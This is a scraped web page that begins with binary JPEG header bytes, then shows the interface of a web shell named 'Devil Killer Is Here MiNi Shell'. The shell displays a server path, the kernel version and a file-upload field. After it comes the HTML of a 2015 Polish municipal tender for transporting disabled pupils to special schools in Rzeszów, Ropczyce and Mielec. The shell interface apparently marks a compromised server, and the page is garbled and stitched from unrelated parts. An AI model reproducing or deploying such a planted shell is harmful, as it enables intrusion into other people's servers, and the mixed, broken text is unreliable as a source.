JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150723/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150723/109105-N-2015.html

<p class="kh_header"><b>Sędziszów Małopolski: DOWÓZ UCZNIÓW NIEPEŁNOSPRAWNYCH 
Z TERENU GMINY SĘDZISZÓW MAŁOPOLSKI 
DO SZKÓŁ I OŚRODKÓW  SZKOLNO - WYCHOWAWCZYCH  
W ROKU SZKOLNYM 2015/2016</b><br>
<b>Numer ogłoszenia: 109105 - 2015; data zamieszczenia: 23.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sędziszów Małopolski , ul. Rynek 1, 39-120 Sędziszów Małopolski, woj. podkarpackie, tel. 17 22 16 001, faks 17 22 16 313.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sedziszow-mlp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOWÓZ UCZNIÓW NIEPEŁNOSPRAWNYCH 
Z TERENU GMINY SĘDZISZÓW MAŁOPOLSKI 
DO SZKÓŁ I OŚRODKÓW  SZKOLNO - WYCHOWAWCZYCH  
W ROKU SZKOLNYM 2015/2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest bezpieczny i punktualny dowóz (przywóz) uczniów niepełnosprawnych zamieszkałych na terenie gminy Sędziszów Małopolski do (z) szkół                          i placówek szkolno - wychowawczych z siedzibą w Rzeszowie, w Ropczycach i w Mielcu wraz z zapewnieniem przewożonym uczniom opieki.
2.	Zamawiający podzielił przedmiot zamówienia na trzy  CZĘŚCI 

CZĘŚĆ I
Dowóz (przywóz) uczniów niepełnosprawnych do (z)  Zespołu Szkół  Specjalnych                                                       oraz Ośrodka Rehabilitacyjno - Edukacyjno- Wychowawczego w Rzeszowie
Trasa Nr 1  (około 96 km tj. 2 x 48 km)  Zagorzyce, Sędziszów Małopolski, ul. Św. Barbary, Wolica Piaskowa, Wolica Ługowa, Sędziszów Małopolski, ul. Letnia, Będziemyśl, Rzeszów
- 6 uczniów, w tym 1 osoba na wózku inwalidzkim 


CZĘŚĆ II
Dowóz (przywóz) uczniów niepełnosprawnych do (z)  Specjalnego  Ośrodka  Szkolno - Wychowawczego  w Ropczycach
Trasa Nr 2 (około 52 km tj. 2 x 26 km) Klęczany, Sędziszów Małopolski ul. Grunwaldzka,   Wolica Ługowa, Sędziszów Małopolski, ul. Rędziny, Góra  Ropczycka, Ropczyce - 7 uczniów

CZĘŚĆ III
Dowóz (przywóz)  uczniów niepełnosprawnych  do (z)  Ośrodka Rehabilitacyjno - Edukacyjno - Wychowawczego w Mielcu

Trasa Nr 3 (około 70km tj. 2 x 35 km) Boreczek 35 C, Borek Wielki, Mielec - 2 uczniów, w tym 2 osoby na wózku inwalidzkim
 
3.	Wspólny Słownik Zamówień (CPV):
60130000-8	Usługi w zakresie specjalistycznego transportu drogowego osób.

4.	Zamawiający zastrzega, iż liczba uczniów może ulec zmianie (zwiększenie lub zmniejszenie). Zamawiający zastrzega sobie możliwość zmiany w następujących przypadkach::
a)	liczby dowożonych uczniów wynikający z naturalnego ruchu w trakcie roku szkolnego (zmiana szkoły przez ucznia, itp.),
b)	liczby dowożonych uczniów na skutek np. choroby ucznia, 
Po każdej zmianie Zamawiający, w terminie 24 godzin od wprowadzenia zmiany, przedłoży Wykonawcy na piśmie aktualny wykaz uczniów (dla odpowiedniej Części).                           W przypadku zmian liczby dowożonych uczniów Wykonawca zobowiązuje się do dowożenia uczniów, zgodnie ze zmienionym wykazem od następnego dnia po wprowadzeniu przez strony zmiany umowy w zakresie wykazu uczniów i miejsca ich odbioru. 
5.	Wykonawca, którego oferta zostanie wybrana otrzyma adresy i imienny wykaz uczniów niepełnosprawnych objętych dowozem do:
a)	Zespołu  Szkół  Specjalnych  im. UNICEF w Rzeszowie przy ulicy Ofiar Katynia 1                         i do Ośrodka Rehabilitacyjno - Edukacyjno - Wychowawczego w Rzeszowie,                           przy ulicy Staszica 10B;
b)	Specjalnego Ośrodka  Szkolno - Wychowawczego w Ropczycach przy ulicy  Wyszyńskiego 14;
c)	Ośrodka Rehabilitacyjno - Edukacyjno - Wychowawczego  w Mielcu przy ulicy  Wojsławskiej 278.
6.	Zamawiający wymaga, aby:
usługi objęte niniejszym zamówieniem były realizowane taborem spełniającym warunki określone w Rozporządzeniu Ministra Infrastruktury z dnia 31 grudnia 2002 w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2003 r. nr 32, poz.262 ze zm.),
7.	Wykonawca zobowiązany jest do: 
a)	Zapewnienia, na daną terasę, minimum jednego sprawnego technicznie pojazdu, przystosowanego do przewozu osób niepełnosprawnych z kierowcą  i  opiekunem.                                                                                                                                                Wymagania dla pojazdu:
1/ pojazd musi posiadać:
-  aktualne badania techniczne dopuszczające pojazd do ruchu drogowego, 
-  tablice Przewóz osób niepełnosprawnych umieszczoną wewnątrz pojazdu przy  
   przedniej i tylnej szybie,
- siedzenia pasażerów wyposażone w pasy bezpieczeństwa biodrowo - barkowe,                       -  siedzenia pasażerów wyposażone i wysokie oparcia lub oparcia z zagłówkami,,
-  windę lub rampę dla wózków inwalidzkich,
-  miejsca siedzące dla każdej z przewożonych osób,
-  sprawną klimatyzację.
b)	posiadania aktualnego, obowiązkowego ubezpieczenia odpowiedzialności cywilnej   - OC posiadaczy pojazdów mechanicznych wraz z ubezpieczeniem od następstw nieszczęśliwych wypadków - NW kierowcy i pasażerów pojazdu mechanicznego. Wykonawca zobowiązuje się zapewnić ciągłość tych ubezpieczeń  w terminie realizacji przedmiotu zamówienia,
c)	podstawienia w razie awarii pojazdu zastępczego,
d)	posiadania przez kierowcę wymaganych prawem uprawnień do przewozu osób,
e)	uczestniczenia w każdym kursie, oprócz kierowcy, jednego opiekuna posiadającego przeszkolenie w zakresie udzielania pierwszej pomocy i/lub kurs opiekuna osób niepełnosprawnych. Funkcji opiekuna nie może pełnić kierowca. Opiekunem może być tylko osoba pełnoletnia, sprawna fizycznie, nie karana, posiadająca pełną zdolność do czynności prawnych,  
f)	zapewnienia zastępstwa w przypadku braku zdolności do świadczenia usług przez wskazanego  w ofercie kierowcę  lub opiekuna, 
g)	przestrzegania punktualności,  ustalonego rozkładu czasowego i tras przejazdów,
h)	zapewnienia dowożonym uczniom odpowiednich warunków bezpieczeństwa, higieny i wygody przejazdów, 
i)	zapewnienia każdemu z uczniów miejsca siedzącego,
j)	zapewnienia odpowiedniej zdolności przewozowej, tj.: liczba przewożonych uczniów plus kierowca i opiekun w każdym pojeździe,  
Ponadto ilość miejsc w pojazdach powinna umożliwiać przyjęcie dodatkowo do przewozu w ciągu roku szkolnego co najmniej dwóch uczniów, 
k)	świadczenia usługi tymi pojazdami, które są wykazane w złożonej ofercie,


l)	ustalenia optymalnego rozkładu jazdy, mając na uwadze jak najkrótszy czas przebywania uczniów w podróży, z uwzględnieniem tego, że uczniowie mają być dowiezieni do szkół (placówek) w takim czasie, aby możliwe było terminowe rozpoczęcie przez uczniów zajęć lekcyjnych,
m)	ustalenia godziny kursów z rodzicami/opiekunami ucznia oraz dyrektorami placówek, do których uczęszczają uczniowie (na podstawie tygodniowego planu lekcji). 
8.	Do obowiązków Opiekuna będzie należało w szczególności:
a)	odbieranie  uczniów od rodziców/opiekunów prawnych spod domu o ustalonej wcześniej godzinie i po odwiezieniu na zajęcia przekazanie uczniów pod opiekę nauczyciela,
b)	po zakończeniu zajęć odbieranie  uczniów od nauczycieli w szkole i po odwiezieniu pod dom przekazanie pod opiekę rodziców/opiekunów lub upoważnionych osób. Nie dopuszcza się przekazywania ucznia w drodze powrotnej ze szkoły do domu osobom nieupoważnionym lub pozostawienia ucznia bez opieki,
c)	 zachowanie  szczególnej dbałości o dobro ucznia w czasie jazdy oraz przy wsiadaniu do pojazdu i wysiadaniu, 
d)	zapewnienie uczniom w szczególności bezpiecznego dla ich zdrowia przejazdu.
9.	Każdy Wykonawca winien przeprowadzić wizję lokalną trasy w celu uzyskania wszelkich informacji koniecznych do przygotowania oferty. Szczególnie należy sprawdzić ilość kilometrów na poszczególnych trasach i dostosować ją do ilości dojeżdżających uczniów oraz posiadanego taboru, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy. Koszt wizji lokalnej ponosi Wykonawca.
10.	Wykonawca ponosi odpowiedzialność za zrekompensowanie szkód wynikających                             z wypadków lub wszelkiego rodzaju zdarzeń wynikłych w czasie wykonywania usługi.
11.	 Wykonawca gwarantuje bezpieczeństwo osób i mienia podczas wykonywania usług przewozu. Zamawiający nie bierze odpowiedzialności za wypadki i zdarzenia jakiegokolwiek typu, w wyniku których nastąpi szkoda materialna, uszkodzenie ciała czy śmierć, spowodowana działalnością Wykonawcy.
12.	Zamawiający ma prawo do kontroli osób oraz pojazdów realizujących zamówienie,                        a także zastrzega sobie prawo do przeprowadzenia w każdej chwili kontroli stanu technicznego pojazdu oraz stanu trzeźwości kierowcy/opiekuna przez odpowiednio powołane do tego celu służby (Policja, Inspekcja Ruchu Drogowego)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, przewidzianych w art. 67 ust. 1 pkt. 6 ustawy Pzp. Zamówienia uzupełniające będą stanowić nie więcej niż 20 % wartości zamówienia podstawowego i polegać będą na powtórzeniu tego samego rodzaju zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada  aktualną licencję na wykonywanie transportu drogowego osób wydaną na podstawie ustawy z dnia                   6 września 2001 r. o transporcie drogowym;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca jednoznacznie wykaże, że dysponuje lub będzie dysponował minimum jednym sprawnie technicznym pojazdem, przystosowanym do przewozu osób niepełnosprawnych.
Minimalne wymagania dla pojazdu.
Pojazd musi posiadać:
a)	aktualne badania techniczne dopuszczające pojazd do ruchu drogowego, 
b)	tablice - Przewóz osób niepełnosprawnych - umieszczoną wewnątrz pojazdu przy przedniej i tylnej szybie,
c)	siedzenia pasażerów wyposażone w pasy bezpieczeństwa biodrowo - barkowe,
d)	siedzenia pasażerów wyposażone w wysokie oparcia lub oparcia z zagłówkami,,
e)	windę lub rampę dla wózków inwalidzkich,
f)	miejsca siedzące dla każdej z przewożonych osób,
g)	sprawną klimatyzację.
Wymagania dotyczą odrębnie każdej z trzech Części zamówienia;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował na czas realizacji zamówienia:


a)	Kierowcą, który posiada wymagane prawem  uprawnienia do kierowania pojazdami przeznaczonymi konstrukcyjnie do przewozu osób, posiada  aktualne badania lekarskie oraz legitymuje się co najmniej 2 - letnim stażem pracy w charakterze kierowcy pojazdu przeznaczonego konstrukcyjnie do przewozu osób.                                        
Zgodnie z przepisami / Ustawa z dnia 5 stycznia  2011r. o kierujących pojazdami (Dz. U. z 10 lutego 2011, poz. 151)/, kategoria D prawa jazdy uprawnia do kierowania pojazdem przeznaczonym konstrukcyjne do przewozu osób.
b)	Opiekunem posiadającym kurs pierwszej pomocy i/lub kurs opiekuna osób niepełnosprawnych; 
Wymagania dotyczą odrębnie każdej z trzech Części zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz Oferty sporządzony na podstawie wzoru stanowiącego załącznik nr 1 do niniejszej IDW;
2)	Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej. Pełnomocnictwo  należy złożyć w formie oryginału albo kopii potwierdzonej za zgodność przez notariusza /odpis/;
3)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu                                 o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia Umowy.                        Dokument należy załączyć w formie oryginału lub kserokopii, poświadczonej za zgodność  z oryginałem przez Wykonawcę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Czas podstawienia pojazdu zastępczego - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy                   w stosunku do treści ofert, na podstawie której dokonano wyboru wykonawcy oraz określa poniżej warunki takiej zmiany:
1/ obniżenie wartości umowy w przypadku odstąpienia od wykonania części usług przewozowych, które obejmowało zamówienie. Warunkami tych zmian są:
a)	wskazanie usługi, której ze względów ekonomicznych lub technicznych nie mogą lub nie muszą być wykonane,

b)	zgoda obu stron,
c)	zmiany te muszą być korzystne dla Zamawiającego,
2/ zmiany wartości umowy w przypadku usług przewozowych zamiennych, wartość umowy zostanie zmieniona o różnice wynikające z właściwych wartości wskazanych                         w formularzu ofertowym. Warunkami tych zmian są:
a)	wskazanie usług przewozowych zamiennych, w przypadku zmian organizacji pracy szkoły, które ze względów ekonomicznych nie mogą być wykonane,
b)	zgoda obu stron,
c)	zmiany te muszą być korzystne dla Zamawiającego,
3/ zmiany terminu wykonania umowy. Warunki takiej zmiany są:
a)	wystąpienie zdarzeń lub okoliczności, których nie można było przewidzieć, a które uniemożliwiają terminową realizację umowy.
W szczególności zdarzenia te obejmują jedną z poniższych przyczyn:
-    zmiana organizacji pracy szkoły,
- niekorzystne warunki atmosferyczne uniemożliwiające organizację nauczania                            w ustalonych kalendarzem roku szkolnego dniach zajęć,
-  konieczność odpracowania dni nauki w innych dniach niż ustalonych w kalendarzu roku szkolnego,
b)	zgoda obu stron umowy,
c)	zmiany te ze względów ekonomicznych muszą być korzystne dla Zamawiającego.
2.	Poza zmianami, o których mowa w ust. 1, zmiany umowy mogą dotyczyć:
a)	wynagrodzenia w przypadku:
- zwiększenia lub zmniejszenia liczby dowożonych uczniów,
- konieczności wykonania zamówień uzupełniających,
b)	harmonogramu dowozów.
3.	Warunkiem dokonania zmian, o których mowa w niniejszym paragrafie  jest złożenie pisemnego wniosku przez stronę inicjującą zmianę, zawierającego: 
a)	opis propozycji zmiany,
b)	uzasadnienie zmiany. 
4.	Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych: 
a)	zmiana danych związanych z obsługą administracyjno - organizacyjną umowy,
b)	zmiana danych teleadresowych, osób reprezentujących strony - wynikających                            ze zmiany stanu faktycznego albo prawnego.
5.	Wszelkie zmiany jakie Strony chciałyby wprowadzić do niniejszej umowy, wymagają zgody obu Stron i winne być zawarte w formie pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.sedziszow-mlp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Sędziszowie Małopolskim, ulica Rynek 10, pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2015 godzina 11:15, miejsce: Urząd Miejski w Sędziszowie Małopolskim, ulica Rynek 1, pokój nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ I Dowóz / przywóz uczniów niepełnosprawnych do / z  Zespołu Szkół  Specjalnych                                                              oraz Ośrodka Rehabilitacyjno - Edukacyjno- Wychowawczego w Rzeszowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dotyczy 6 uczniów, w tym 1 osoba na wózku inwalidzkim.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
